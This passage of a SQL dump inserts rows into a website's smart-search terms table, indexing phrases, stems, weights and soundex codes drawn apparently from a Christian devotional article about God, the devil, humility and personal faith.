(278010, 'confessing', 'confess', 0, 0, 0.6667, 'C51252', 1, '*'),
(278011, 'confessing what', 'confess what', 0, 1, 1.5, 'C512523', 1, '*'),
(278012, 'confessing what god', 'confess what god', 0, 1, 1.6333, 'C51252323', 1, '*'),
(278013, 'confession of our', 'confess of our', 0, 1, 1.5667, 'C512516', 1, '*'),
(278014, 'confidence that god', 'confid that god', 0, 1, 1.6333, 'C51352323', 1, '*'),
(278015, 'confused about', 'confus about', 0, 1, 1.4667, 'C512313', 1, '*'),
(278016, 'confused about god\'s', 'confus about god', 0, 1, 1.6667, 'C512313232', 1, '*'),
(278017, 'consistent with', 'consist with', 0, 1, 1.5, 'C52353', 1, '*'),
(278018, 'consistent with how', 'consist with how', 0, 1, 1.6333, 'C52353', 1, '*'),
(278019, 'consistently be', 'consist be', 0, 1, 1.5, 'C5235341', 1, '*'),
(278020, 'consistently be prospering', 'consist be prospering', 0, 1, 1.8667, 'C5235341621652', 1, '*'),
(278021, 'consult', 'consult', 0, 0, 0.4667, 'C5243', 1, '*'),
(278022, 'consult some', 'consult some', 0, 1, 1.4, 'C524325', 1, '*'),
(278023, 'consult some spiritual', 'consult some spiritual', 0, 1, 1.7333, 'C52432521634', 1, '*'),
(278024, 'contaminated', 'contamin', 0, 0, 0.8, 'C5353', 1, '*'),
(278025, 'contaminated by', 'contamin by', 0, 1, 1.5, 'C53531', 1, '*'),
(278026, 'contaminated by worldly', 'contamin by worldly', 0, 1, 1.7667, 'C535316434', 1, '*'),
(278027, 'cooking', 'cook', 0, 0, 0.4667, 'C520', 1, '*'),
(278028, 'cooking and', 'cook and', 0, 1, 1.3667, 'C5253', 1, '*'),
(278029, 'cooking and getting', 'cook and getting', 0, 1, 1.6333, 'C52532352', 1, '*'),
(278030, 'corinthians 13 1-8', 'corinthian 13 1-8', 0, 1, 1.6, 'C65352', 1, '*'),
(278031, 'cost of', 'cost of', 0, 1, 1.2333, 'C310', 1, '*'),
(278032, 'cost of a', 'cost of a', 0, 1, 1.3, 'C310', 1, '*'),
(278033, 'covenants especially', 'coven especially', 0, 1, 1.6667, 'C1532124', 1, '*'),
(278034, 'covenants especially because', 'coven especially because', 0, 1, 1.9333, 'C153212412', 1, '*'),
(278035, 'create people', 'creat people', 0, 1, 1.4333, 'C6314', 1, '*'),
(278036, 'create people who', 'creat people who', 0, 1, 1.5667, 'C6314', 1, '*'),
(278037, 'created', 'creat', 0, 0, 0.4667, 'C630', 1, '*'),
(278038, 'created man', 'creat man', 0, 1, 1.3667, 'C635', 1, '*'),
(278039, 'created man his', 'creat man his', 0, 1, 1.5, 'C6352', 1, '*'),
(278040, 'danger of religiousness', 'danger of religiousness', 0, 1, 1.7667, 'D526164252', 1, '*'),
(278041, 'danger that', 'danger that', 0, 1, 1.3667, 'D5263', 1, '*'),
(278042, 'danger that allowing', 'danger that allowing', 0, 1, 1.6667, 'D5263452', 1, '*'),
(278043, 'daunting', 'daunt', 0, 0, 0.5333, 'D5352', 1, '*'),
(278044, 'daunting exercise', 'daunt exercise', 0, 1, 1.5667, 'D535262', 1, '*'),
(278045, 'daunting exercise but', 'daunt exercise but', 0, 1, 1.7, 'D53526213', 1, '*'),
(278046, 'david was confused', 'david was confused', 0, 1, 1.6, 'D1325123', 1, '*'),
(278047, 'dealt with', 'dealt with', 0, 1, 1.3333, 'D430', 1, '*'),
(278048, 'dealt with the', 'dealt with the', 0, 1, 1.4667, 'D430', 1, '*'),
(278049, 'determine the outcome', 'determin the outcome', 0, 1, 1.7, 'D65325', 1, '*'),
(278050, 'devil a', 'devil a', 0, 1, 1.2333, 'D140', 1, '*'),
(278051, 'devil a legal', 'devil a legal', 0, 1, 1.4333, 'D1424', 1, '*'),
(278052, 'devil an', 'devil an', 0, 1, 1.2667, 'D145', 1, '*'),
(278053, 'devil an inch', 'devil an inch', 0, 1, 1.4333, 'D1452', 1, '*'),
(278054, 'devil away', 'devil away', 0, 1, 1.3333, 'D140', 1, '*'),
(278055, 'devil away from', 'devil away from', 0, 1, 1.5, 'D14165', 1, '*'),
(278056, 'devil knows', 'devil knows', 0, 1, 1.3667, 'D14252', 2, '*'),
(278057, 'devil knows the', 'devil knows the', 0, 1, 1.5, 'D142523', 1, '*'),
(278058, 'devil lastly', 'devil lastly', 0, 1, 1.4, 'D14234', 1, '*'),
(278059, 'devil lastly if', 'devil lastly if', 0, 1, 1.5, 'D142341', 1, '*'),
(278060, 'devil the best', 'devil the best', 0, 1, 1.4667, 'D143123', 1, '*'),
(278061, 'devil they', 'devil they', 0, 1, 1.3333, 'D143', 1, '*'),
(278062, 'devil they tend', 'devil they tend', 0, 1, 1.5, 'D14353', 1, '*'),
(278063, 'devil you', 'devil you', 0, 1, 1.3, 'D140', 1, '*'),
(278064, 'devil you have', 'devil you have', 0, 1, 1.4667, 'D141', 1, '*'),
(278065, 'didn\'t know', 'didn know', 0, 1, 1.3667, 'D5325', 1, '*'),
(278066, 'didn\'t know is', 'didn know is', 0, 1, 1.4667, 'D53252', 1, '*'),
(278067, 'didn\'t say', 'didn say', 0, 1, 1.3333, 'D532', 1, '*'),
(278068, 'didn\'t say “don\'t', 'didn say “don', 0, 1, 1.5667, 'D532353', 1, '*'),
(278069, 'die for', 'die for', 0, 1, 1.2333, 'D160', 1, '*'),
(278070, 'die for the', 'die for the', 0, 1, 1.3667, 'D163', 1, '*'),
(278071, 'different attitudes', 'differ attitudes', 0, 1, 1.6333, 'D16532', 1, '*'),
(278072, 'different attitudes to', 'differ attitudes to', 0, 1, 1.7333, 'D165323', 1, '*'),
(278073, 'different situations you', 'differ situations you', 0, 1, 1.8, 'D16532352', 1, '*'),
(278074, 'differentiate', 'differenti', 0, 0, 0.8667, 'D1653', 1, '*'),
(278075, 'differentiate yourself', 'differenti yourself', 0, 1, 1.7333, 'D16536241', 1, '*'),
(278076, 'differentiate yourself from', 'differenti yourself from', 0, 1, 1.9, 'D1653624165', 1, '*'),
(278077, 'directly that', 'directli that', 0, 1, 1.4333, 'D62343', 1, '*'),
(278078, 'directly that they', 'directli that they', 0, 1, 1.6, 'D62343', 1, '*'),
(278079, 'dirty', 'dirti', 0, 0, 0.3333, 'D630', 1, '*'),
(278080, 'dirty semi', 'dirti semi', 0, 1, 1.3333, 'D6325', 1, '*'),
(278081, 'dirty semi quarter', 'dirti semi quarter', 0, 1, 1.6, 'D63252636', 1, '*'),
(278082, 'do even jesus', 'do even jesus', 0, 1, 1.4333, 'D152', 1, '*'),
(278083, 'do everything', 'do everything', 0, 1, 1.4333, 'D16352', 1, '*'),
(278084, 'do everything in', 'do everything in', 0, 1, 1.5333, 'D163525', 1, '*'),
(278085, 'doesn\'t engage', 'doesn engage', 0, 1, 1.4667, 'D25352', 1, '*'),
(278086, 'doesn\'t engage in', 'doesn engage in', 0, 1, 1.5667, 'D253525', 1, '*'),
(278087, 'doesn\'t gossip', 'doesn gossip', 0, 1, 1.4667, 'D25321', 1, '*'),
(278088, 'doesn\'t gossip backbite', 'doesn gossip backbite', 0, 1, 1.7667, 'D25321213', 1, '*'),
(278089, 'doing although', 'do although', 0, 1, 1.4667, 'D52432', 1, '*'),
(278090, 'doing although they', 'do although they', 0, 1, 1.6333, 'D524323', 1, '*'),
(278091, 'don\'t give the', 'don give the', 0, 1, 1.4667, 'D53213', 1, '*'),
(278092, 'don\'t mistakenly', 'don mistakenly', 0, 1, 1.5333, 'D53523254', 1, '*'),
(278093, 'don\'t mistakenly step', 'don mistakenly step', 0, 1, 1.7, 'D53523254231', 1, '*'),
(278094, 'don\'t think', 'don think', 0, 1, 1.3667, 'D5352', 1, '*'),
(278095, 'don\'t think more', 'don think more', 0, 1, 1.5333, 'D535256', 1, '*'),
(278096, 'dress that', 'dress that', 0, 1, 1.3333, 'D623', 1, '*'),
(278097, 'dress that you', 'dress that you', 0, 1, 1.4667, 'D623', 1, '*'),
(278098, 'dressed at', 'dress at', 0, 1, 1.3333, 'D623', 1, '*'),
(278099, 'dressed at all', 'dress at all', 0, 1, 1.4667, 'D6234', 1, '*'),
(278100, 'dressing must', 'dress must', 0, 1, 1.4333, 'D6252523', 1, '*'),
(278101, 'dressing must be', 'dress must be', 0, 1, 1.5333, 'D62525231', 1, '*'),
(278102, 'duties of', 'duti of', 0, 1, 1.3, 'D210', 1, '*'),
(278103, 'duties of a', 'duti of a', 0, 1, 1.3667, 'D210', 1, '*'),
(278104, 'easiest challenges', 'easiest challenges', 0, 1, 1.6, 'E232452', 1, '*'),
(278105, 'easiest challenges you\'ll', 'easiest challenges you', 0, 1, 1.8333, 'E2324524', 1, '*'),
(278106, 'easy as', 'easi as', 0, 1, 1.2333, 'E200', 1, '*'),
(278107, 'easy as this', 'easi as this', 0, 1, 1.4, 'E232', 1, '*'),
(278108, 'eat and', 'eat and', 0, 1, 1.2333, 'E353', 1, '*'),
(278109, 'eat and breathe', 'eat and breathe', 0, 1, 1.5, 'E353163', 1, '*'),
(278110, 'eaten', 'eaten', 0, 0, 0.3333, 'E350', 1, '*'),
(278111, 'eaten the', 'eaten the', 0, 1, 1.3, 'E353', 1, '*'),
(278112, 'eaten the food', 'eaten the food', 0, 1, 1.4667, 'E35313', 1, '*'),
(278113, 'either your', 'either your', 0, 1, 1.3667, 'E360', 1, '*'),
(278114, 'either your lifestyle', 'either your lifestyle', 0, 1, 1.7, 'E3641234', 1, '*'),
(278115, 'engage in idle', 'engag in idle', 0, 1, 1.4667, 'E52534', 1, '*'),
(278116, 'error to', 'error to', 0, 1, 1.2667, 'E630', 1, '*'),
(278117, 'error to think', 'error to think', 0, 1, 1.4667, 'E6352', 1, '*'),
(278118, 'especially because', 'especi because', 0, 1, 1.6, 'E212412', 1, '*'),
(278119, 'especially because you', 'especi because you', 0, 1, 1.7333, 'E212412', 1, '*'),
(278120, 'even david', 'even david', 0, 1, 1.3333, 'E15313', 1, '*'),
(278121, 'even david was', 'even david was', 0, 1, 1.4667, 'E153132', 1, '*'),
(278122, 'even jesus rebuked', 'even jesus rebuked', 0, 1, 1.6, 'E1526123', 1, '*'),
(278123, 'ever become', 'ever become', 0, 1, 1.3667, 'E16125', 2, '*'),
(278124, 'ever become like', 'ever become like', 0, 1, 1.5333, 'E1612542', 1, '*'),
(278125, 'ever in', 'ever in', 0, 1, 1.2333, 'E165', 1, '*'),
(278126, 'ever in a', 'ever in a', 0, 1, 1.3, 'E165', 1, '*'),
(278127, 'everything in', 'everyth in', 0, 1, 1.4333, 'E163525', 1, '*'),
(278128, 'everything in his', 'everyth in his', 0, 1, 1.5667, 'E1635252', 1, '*'),
(278129, 'everything ready', 'everyth ready', 0, 1, 1.5333, 'E1635263', 1, '*'),
(278130, 'everything ready for', 'everyth ready for', 0, 1, 1.6667, 'E163526316', 1, '*'),
(278131, 'everything you wear', 'everyth you wear', 0, 1, 1.6333, 'E163526', 1, '*'),
(278132, 'example of this', 'exampl of this', 0, 1, 1.5, 'E2514132', 1, '*'),
(278133, 'exercise but', 'exercis but', 0, 1, 1.4, 'E26213', 1, '*'),
(278134, 'exercise but what', 'exercis but what', 0, 1, 1.5667, 'E26213', 1, '*'),
(278135, 'existence', 'exist', 0, 0, 0.6, 'E2352', 1, '*'),
(278136, 'existence through', 'exist through', 0, 1, 1.5667, 'E2352362', 1, '*'),
(278137, 'existence through faith', 'exist through faith', 0, 1, 1.7667, 'E235236213', 1, '*'),
(278138, 'expected to', 'expect to', 0, 1, 1.3667, 'E2123', 1, '*'),
(278139, 'expected to a', 'expect to a', 0, 1, 1.4333, 'E2123', 1, '*'),
(278140, 'expected to be', 'expect to be', 0, 1, 1.4667, 'E21231', 1, '*'),
(278141, 'expected to use', 'expect to use', 0, 1, 1.5, 'E21232', 1, '*'),
(278142, 'experiences you would', 'experi you would', 0, 1, 1.7, 'E2165243', 1, '*'),
(278143, 'faith and the', 'faith and the', 0, 1, 1.4333, 'F353', 1, '*'),
(278144, 'far let', 'far let', 0, 1, 1.2333, 'F643', 1, '*'),
(278145, 'far let us', 'far let us', 0, 1, 1.3333, 'F6432', 1, '*'),
(278146, 'farther', 'farther', 0, 0, 0.4667, 'F636', 1, '*'),
(278147, 'farther you', 'farther you', 0, 1, 1.3667, 'F636', 1, '*'),
(278148, 'farther you are', 'farther you are', 0, 1, 1.5, 'F636', 1, '*'),
(278149, 'fellow man', 'fellow man', 0, 1, 1.3333, 'F450', 1, '*'),
(278150, 'fellow man as', 'fellow man as', 0, 1, 1.4333, 'F452', 1, '*'),
(278151, 'fellowship with him', 'fellowship with him', 0, 1, 1.6333, 'F42135', 1, '*'),
(278152, 'fellowshipping', 'fellowship', 0, 0, 0.9333, 'F42152', 1, '*'),
(278153, 'fellowshipping with', 'fellowship with', 0, 1, 1.6333, 'F421523', 1, '*'),
(278154, 'fellowshipping with him', 'fellowship with him', 0, 1, 1.7667, 'F4215235', 1, '*'),
(278155, 'find yourself now', 'find yourself now', 0, 1, 1.5667, 'F5362415', 1, '*'),
(278156, 'focus', 'focu', 0, 0, 0.3333, 'F200', 1, '*'),
(278157, 'focus it', 'focu it', 0, 1, 1.2667, 'F230', 1, '*'),
(278158, 'focus it is', 'focu it is', 0, 1, 1.3667, 'F232', 1, '*'),
(278159, 'focus on', 'focu on', 0, 1, 1.2667, 'F250', 1, '*'),
(278160, 'focus on the', 'focu on the', 0, 1, 1.4, 'F253', 1, '*'),
(278161, 'follow a', 'follow a', 0, 1, 1.2667, 'F400', 1, '*'),
(278162, 'follow a set', 'follow a set', 0, 1, 1.4, 'F423', 1, '*'),
(278163, 'following i', 'follow i', 0, 1, 1.3667, 'F452', 1, '*'),
(278164, 'following i you', 'follow i you', 0, 1, 1.5, 'F452', 1, '*'),
(278165, 'food and gone', 'food and gone', 0, 1, 1.4333, 'F35325', 1, '*'),
(278166, 'foothold', 'foothold', 0, 0, 0.5333, 'F343', 1, '*'),
(278167, 'foothold in', 'foothold in', 0, 1, 1.3667, 'F3435', 1, '*'),
(278168, 'foothold in your', 'foothold in your', 0, 1, 1.5333, 'F34356', 1, '*'),
(278169, 'for a christian', 'for a christian', 0, 1, 1.5, 'F626235', 1, '*'),
(278170, 'for a fellow', 'for a fellow', 0, 1, 1.4, 'F614', 1, '*'),
(278171, 'for being', 'for being', 0, 1, 1.3, 'F6152', 1, '*'),
(278172, 'for being religious', 'for being religious', 0, 1, 1.6333, 'F6152642', 1, '*'),
(278173, 'for change', 'for change', 0, 1, 1.3333, 'F6252', 1, '*'),
(278174, 'for change in', 'for change in', 0, 1, 1.4333, 'F62525', 1, '*'),
(278175, 'for jesus jesus', 'for jesus jesus', 0, 1, 1.5, 'F620', 1, '*'),
(278176, 'for the sins', 'for the sins', 0, 1, 1.4, 'F63252', 1, '*'),
(278177, 'for us there', 'for us there', 0, 1, 1.4, 'F6236', 1, '*'),
(278178, 'for women', 'for women', 0, 1, 1.3, 'F650', 1, '*'),
(278179, 'for women any', 'for women any', 0, 1, 1.4333, 'F650', 1, '*'),
(278180, 'forth things', 'forth things', 0, 1, 1.4, 'F6352', 1, '*'),
(278181, 'forth things that', 'forth things that', 0, 1, 1.5667, 'F63523', 1, '*'),
(278182, 'fortunately', 'fortun', 0, 0, 0.7333, 'F63534', 1, '*'),
(278183, 'fortunately for', 'fortun for', 0, 1, 1.5, 'F6353416', 1, '*'),
(278184, 'fortunately for us', 'fortun for us', 0, 1, 1.6, 'F63534162', 1, '*'),
(278185, 'foul', 'foul', 0, 0, 0.2667, 'F400', 1, '*'),
(278186, 'foul slangs', 'foul slangs', 0, 1, 1.3667, 'F42452', 1, '*'),
(278187, 'foul slangs and', 'foul slangs and', 0, 1, 1.5, 'F4245253', 1, '*'),
(278188, 'found guilty', 'found guilty', 0, 1, 1.4, 'F53243', 1, '*'),
(278189, 'found guilty of', 'found guilty of', 0, 1, 1.5, 'F532431', 1, '*'),
(278190, 'found in your', 'found in your', 0, 1, 1.4333, 'F5356', 1, '*'),
(278191, 'freewill', 'freewil', 0, 0, 0.5333, 'F640', 1, '*'),
(278192, 'freewill the', 'freewil the', 0, 1, 1.4, 'F643', 1, '*'),
(278193, 'freewill the danger', 'freewil the danger', 0, 1, 1.6333, 'F643526', 1, '*'),
(278194, 'from the devil', 'from the devil', 0, 1, 1.4667, 'F65314', 1, '*'),
(278195, 'from the world', 'from the world', 0, 1, 1.4667, 'F653643', 1, '*'),
(278196, 'from their manner', 'from their manner', 0, 1, 1.5667, 'F653656', 1, '*'),
(278197, 'from thinking', 'from thinking', 0, 1, 1.4333, 'F6535252', 1, '*'),
(278198, 'from thinking the', 'from thinking the', 0, 1, 1.5667, 'F65352523', 1, '*'),
(278199, 'from your thoughts', 'from your thoughts', 0, 1, 1.6, 'F6563232', 1, '*'),
(278200, 'front', 'front', 0, 0, 0.3333, 'F653', 2, '*'),
(278201, 'front of', 'front of', 0, 1, 1.2667, 'F6531', 2, '*'),
(278202, 'front of your', 'front of your', 0, 1, 1.4333, 'F65316', 1, '*'),
(278203, 'frustrating', 'frustrat', 0, 0, 0.7333, 'F6236352', 1, '*'),
(278204, 'frustrating thoughts', 'frustrat thoughts', 0, 1, 1.6667, 'F62363523232', 1, '*'),
(278205, 'frustrating thoughts negative', 'frustrat thoughts negative', 0, 1, 1.9667, 'F623635232325231', 1, '*'),
(278206, 'funny thing', 'funni thing', 0, 1, 1.3667, 'F5352', 1, '*'),
(278207, 'funny thing about', 'funni thing about', 0, 1, 1.5667, 'F535213', 1, '*'),
(278208, 'gave his', 'gave his', 0, 1, 1.2667, 'G120', 1, '*'),
(278209, 'gave his only', 'gave his only', 0, 1, 1.4333, 'G1254', 1, '*'),
(278210, 'getting everything', 'get everything', 0, 1, 1.6, 'G35216352', 1, '*'),
(278211, 'getting everything ready', 'get everything ready', 0, 1, 1.8, 'G3521635263', 1, '*'),
(278212, 'give the devil', 'give the devil', 0, 1, 1.4667, 'G1314', 1, '*'),
(278213, 'given us that', 'given us that', 0, 1, 1.4333, 'G1523', 1, '*'),
(278214, 'gives the devil', 'give the devil', 0, 1, 1.5, 'G12314', 1, '*'),
(278215, 'glorify', 'glorifi', 0, 0, 0.4667, 'G461', 1, '*'),
(278216, 'glorify god', 'glorifi god', 0, 1, 1.3667, 'G46123', 1, '*'),
(278217, 'glorify god this', 'glorifi god this', 0, 1, 1.5333, 'G461232', 1, '*'),
(278218, 'glorious experiences', 'gloriou experiences', 0, 1, 1.6667, 'G4621652', 1, '*'),
(278219, 'glorious experiences you', 'gloriou experiences you', 0, 1, 1.8, 'G4621652', 1, '*'),
(278220, 'glorious opportunity', 'gloriou opportunity', 0, 1, 1.6667, 'G46216353', 1, '*'),
(278221, 'glorious opportunity to', 'gloriou opportunity to', 0, 1, 1.7667, 'G46216353', 1, '*'),
(278222, 'glory and', 'glori and', 0, 1, 1.3, 'G4653', 1, '*'),
(278223, 'glory and bringglory', 'glori and bringglory', 0, 1, 1.6667, 'G4653165246', 1, '*'),
(278224, 'glory and light', 'glori and light', 0, 1, 1.5, 'G4653423', 1, '*'),
(278225, 'glory in', 'glori in', 0, 1, 1.2667, 'G465', 1, '*'),
(278226, 'glory in you', 'glori in you', 0, 1, 1.4, 'G465', 1, '*'),
(278227, 'go too', 'go too', 0, 1, 1.2, 'G300', 1, '*'),
(278228, 'go too far', 'go too far', 0, 1, 1.3333, 'G316', 1, '*'),
(278229, 'god acting', 'god acting', 0, 1, 1.3333, 'G32352', 1, '*'),
(278230, 'god acting like', 'god acting like', 0, 1, 1.5, 'G3235242', 1, '*'),
(278231, 'god and resist', 'god and resist', 0, 1, 1.4667, 'G353623', 1, '*'),
(278232, 'god and should', 'god and should', 0, 1, 1.4667, 'G353243', 1, '*'),
(278233, 'god and to', 'god and to', 0, 1, 1.3333, 'G353', 1, '*'),
(278234, 'god approves', 'god approves', 0, 1, 1.4, 'G31612', 1, '*'),
(278235, 'god approves romans', 'god approves romans', 0, 1, 1.6333, 'G31612652', 1, '*'),
(278236, 'god as a', 'god as a', 0, 1, 1.2667, 'G320', 1, '*'),
(278237, 'god created', 'god created', 0, 1, 1.3667, 'G3263', 1, '*'),
(278238, 'god created man', 'god created man', 0, 1, 1.5, 'G32635', 1, '*'),
(278239, 'god doesn\'t engage', 'god doesn engage', 0, 1, 1.6, 'G325352', 1, '*'),
(278240, 'god doesn\'t gossip', 'god doesn gossip', 0, 1, 1.6, 'G325321', 1, '*'),
(278241, 'god gave his', 'god gave his', 0, 1, 1.4, 'G3212', 1, '*'),
(278242, 'god hates', 'god hates', 0, 1, 1.3, 'G320', 2, '*'),
(278243, 'god hates religion', 'god hates religion', 0, 1, 1.6, 'G326425', 1, '*'),
(278244, 'god i\'m', 'god i', 0, 1, 1.2333, 'G350', 1, '*'),
(278245, 'god i\'m aware', 'god i aware', 0, 1, 1.4333, 'G356', 1, '*'),
(278246, 'god in how', 'god in how', 0, 1, 1.3333, 'G350', 1, '*'),
(278247, 'god in vain', 'god in vain', 0, 1, 1.3667, 'G3515', 1, '*'),
(278248, 'god is clothed', 'god is clothed', 0, 1, 1.4667, 'G3243', 1, '*'),
(278249, 'god is god', 'god is god', 0, 1, 1.3333, 'G323', 1, '*'),
(278250, 'god is love', 'god is love', 0, 1, 1.3667, 'G3241', 1, '*'),
(278251, 'god made us', 'god made us', 0, 1, 1.3667, 'G3532', 1, '*'),
(278252, 'god made you', 'god made you', 0, 1, 1.4, 'G353', 2, '*'),
(278253, 'god matthew', 'god matthew', 0, 1, 1.3667, 'G353', 1, '*'),
(278254, 'god matthew 12', 'god matthew 12', 0, 1, 1.4667, 'G353', 1, '*'),
(278255, 'god means', 'god means', 0, 1, 1.3, 'G352', 1, '*'),
(278256, 'god means to', 'god means to', 0, 1, 1.4, 'G3523', 1, '*'),
(278257, 'god poses', 'god poses', 0, 1, 1.3, 'G312', 1, '*'),
(278258, 'god poses to', 'god poses to', 0, 1, 1.4, 'G3123', 1, '*'),
(278259, 'god proverbs', 'god proverbs', 0, 1, 1.4, 'G3161612', 1, '*'),
(278260, 'god proverbs 23', 'god proverbs 23', 0, 1, 1.5, 'G3161612', 1, '*'),
(278261, 'god resists', 'god resists', 0, 1, 1.3667, 'G36232', 1, '*'),
(278262, 'god resists the', 'god resists the', 0, 1, 1.5, 'G362323', 1, '*'),
(278263, 'god the closer', 'god the closer', 0, 1, 1.4667, 'G32426', 1, '*'),
(278264, 'god the devil', 'god the devil', 0, 1, 1.4333, 'G314', 1, '*'),
(278265, 'god the farther', 'god the farther', 0, 1, 1.5, 'G31636', 1, '*'),
(278266, 'god they', 'god they', 0, 1, 1.2667, 'G300', 2, '*'),
(278267, 'god they are', 'god they are', 0, 1, 1.4, 'G360', 1, '*'),
(278268, 'god this', 'god this', 0, 1, 1.2667, 'G320', 2, '*'),
(278269, 'god this is', 'god this is', 0, 1, 1.3667, 'G320', 1, '*'),
(278270, 'god this not', 'god this not', 0, 1, 1.4, 'G3253', 1, '*'),
(278271, 'god until', 'god until', 0, 1, 1.3, 'G3534', 1, '*'),
(278272, 'god until you', 'god until you', 0, 1, 1.4333, 'G3534', 1, '*'),
(278273, 'god wants our', 'god wants our', 0, 1, 1.4333, 'G35326', 1, '*'),
(278274, 'god wants your', 'god wants your', 0, 1, 1.4667, 'G35326', 1, '*'),
(278275, 'god when martha', 'god when martha', 0, 1, 1.5, 'G3563', 1, '*'),
(278276, 'god would behave', 'god would behave', 0, 1, 1.5333, 'G3431', 1, '*'),
(278277, 'god\'s glory and', 'god glory and', 0, 1, 1.5, 'G324653', 1, '*'),
(278278, 'god\'s glory in', 'god glory in', 0, 1, 1.4667, 'G32465', 1, '*'),
(278279, 'god\'s nature', 'god nature', 0, 1, 1.4, 'G32536', 1, '*'),
(278280, 'god\'s nature if', 'god nature if', 0, 1, 1.5, 'G325361', 1, '*'),
(278281, 'god\'s obsession', 'god obsession', 0, 1, 1.5, 'G32125', 1, '*'),
(278282, 'god\'s obsession with', 'god obsession with', 0, 1, 1.6667, 'G321253', 1, '*'),
(278283, 'god\'s power', 'god power', 0, 1, 1.3667, 'G3216', 1, '*'),
(278284, 'god\'s power is', 'god power is', 0, 1, 1.4667, 'G32162', 1, '*'),
(278285, 'godly', 'godli', 0, 0, 0.3333, 'G340', 1, '*'),
(278286, 'godly majority', 'godli majority', 0, 1, 1.4667, 'G345263', 1, '*'),
(278287, 'godly majority of', 'godli majority of', 0, 1, 1.5667, 'G3452631', 1, '*'),
(278288, 'gone his', 'gone his', 0, 1, 1.2667, 'G520', 1, '*'),
(278289, 'gone his way', 'gone his way', 0, 1, 1.4, 'G520', 1, '*'),
(278290, 'gossip', 'gossip', 0, 0, 0.4, 'G100', 1, '*'),
(278291, 'gossip backbite', 'gossip backbite', 0, 1, 1.5, 'G1213', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(278292, 'gossip backbite or', 'gossip backbite or', 0, 1, 1.6, 'G12136', 1, '*'),
(278293, 'guilty', 'guilti', 0, 0, 0.4, 'G430', 1, '*'),
(278294, 'guilty of', 'guilti of', 0, 1, 1.3, 'G431', 1, '*'),
(278295, 'guilty of any', 'guilti of any', 0, 1, 1.4333, 'G4315', 1, '*'),
(278296, 'had a personal', 'had a personal', 0, 1, 1.4667, 'H316254', 1, '*'),
(278297, 'had been like', 'had been like', 0, 1, 1.4333, 'H31542', 1, '*'),
(278298, 'had if', 'had if', 0, 1, 1.2, 'H310', 1, '*'),
(278299, 'had if you', 'had if you', 0, 1, 1.3333, 'H310', 1, '*'),
(278300, 'happen in your', 'happen in your', 0, 1, 1.4667, 'H156', 1, '*'),
(278301, 'has said in', 'ha said in', 0, 1, 1.3667, 'H235', 1, '*'),
(278302, 'hates religion', 'hate religion', 0, 1, 1.4667, 'H326425', 1, '*'),
(278303, 'hates religion with', 'hate religion with', 0, 1, 1.6333, 'H3264253', 1, '*'),
(278304, 'have anything', 'have anything', 0, 1, 1.4333, 'H15352', 1, '*'),
(278305, 'have anything in', 'have anything in', 0, 1, 1.5333, 'H153525', 1, '*'),
(278306, 'have eaten', 'have eaten', 0, 1, 1.3333, 'H135', 1, '*'),
(278307, 'have eaten the', 'have eaten the', 0, 1, 1.4667, 'H1353', 1, '*'),
(278308, 'have had if', 'have had if', 0, 1, 1.3667, 'H131', 1, '*'),
(278309, 'have missed', 'have missed', 0, 1, 1.3667, 'H1523', 1, '*'),
(278310, 'have missed the', 'have missed the', 0, 1, 1.5, 'H1523', 1, '*'),
(278311, 'have personal', 'have personal', 0, 1, 1.4333, 'H16254', 1, '*'),
(278312, 'have personal fellowship', 'have personal fellowship', 0, 1, 1.8, 'H162541421', 1, '*'),
(278313, 'have to follow', 'have to follow', 0, 1, 1.4667, 'H1314', 1, '*'),
(278314, 'have to overcome', 'have to overcome', 0, 1, 1.5333, 'H131625', 1, '*'),
(278315, 'having precedence', 'have precedence', 0, 1, 1.5667, 'H152162352', 1, '*'),
(278316, 'having precedence in', 'have precedence in', 0, 1, 1.6667, 'H1521623525', 1, '*'),
(278317, 'he has told', 'he has told', 0, 1, 1.3667, 'H2343', 1, '*'),
(278318, 'he knows', 'he knows', 0, 1, 1.2667, 'H252', 2, '*'),
(278319, 'he knows it', 'he knows it', 0, 1, 1.3667, 'H2523', 1, '*'),
(278320, 'he ought', 'he ought', 0, 1, 1.2667, 'H230', 1, '*'),
(278321, 'he ought to', 'he ought to', 0, 1, 1.3667, 'H230', 1, '*'),
(278322, 'he\'ll bring', 'he bring', 0, 1, 1.3667, 'H41652', 1, '*'),
(278323, 'he\'ll bring all', 'he bring all', 0, 1, 1.5, 'H416524', 1, '*'),
(278324, 'he\'ll do everything', 'he do everything', 0, 1, 1.6333, 'H4316352', 1, '*'),
(278325, 'hear the master', 'hear the master', 0, 1, 1.5, 'H635236', 1, '*'),
(278326, 'heartfelt', 'heartfelt', 0, 0, 0.6, 'H63143', 1, '*'),
(278327, 'heartfelt personal', 'heartfelt personal', 0, 1, 1.6, 'H6314316254', 1, '*'),
(278328, 'heartfelt personal relationship', 'heartfelt personal relationship', 0, 1, 2, 'H6314316254643521', 1, '*'),
(278329, 'helping', 'help', 0, 0, 0.4667, 'H4152', 1, '*'),
(278330, 'helping her', 'help her', 0, 1, 1.3667, 'H41526', 1, '*'),
(278331, 'helping her jesus', 'help her jesus', 0, 1, 1.5667, 'H415262', 1, '*'),
(278332, 'her jesus', 'her jesus', 0, 1, 1.3, 'H620', 1, '*'),
(278333, 'her jesus made', 'her jesus made', 0, 1, 1.4667, 'H6253', 1, '*'),
(278334, 'her personal', 'her personal', 0, 1, 1.4, 'H616254', 1, '*'),
(278335, 'her personal relationship', 'her personal relationship', 0, 1, 1.8333, 'H616254643521', 1, '*'),
(278336, 'her realize', 'her realize', 0, 1, 1.3667, 'H642', 1, '*'),
(278337, 'her realize that', 'her realize that', 0, 1, 1.5333, 'H6423', 1, '*'),
(278338, 'highly of', 'highli of', 0, 1, 1.3, 'H241', 1, '*'),
(278339, 'highly of ourselves', 'highli of ourselves', 0, 1, 1.6333, 'H24162412', 1, '*'),
(278340, 'highly of yourself.”', 'highli of yourself.”', 0, 1, 1.6667, 'H2416241', 1, '*'),
(278341, 'highly than', 'highli than', 0, 1, 1.3667, 'H2435', 1, '*'),
(278342, 'highly than he', 'highli than he', 0, 1, 1.4667, 'H2435', 1, '*'),
(278343, 'highly than you', 'highli than you', 0, 1, 1.5, 'H2435', 1, '*'),
(278344, 'him and fellowshipping', 'him and fellowshipping', 0, 1, 1.7333, 'H53142152', 1, '*'),
(278345, 'him and he\'ll', 'him and he', 0, 1, 1.4333, 'H534', 1, '*'),
(278346, 'him as easy', 'him as easy', 0, 1, 1.3667, 'H520', 1, '*'),
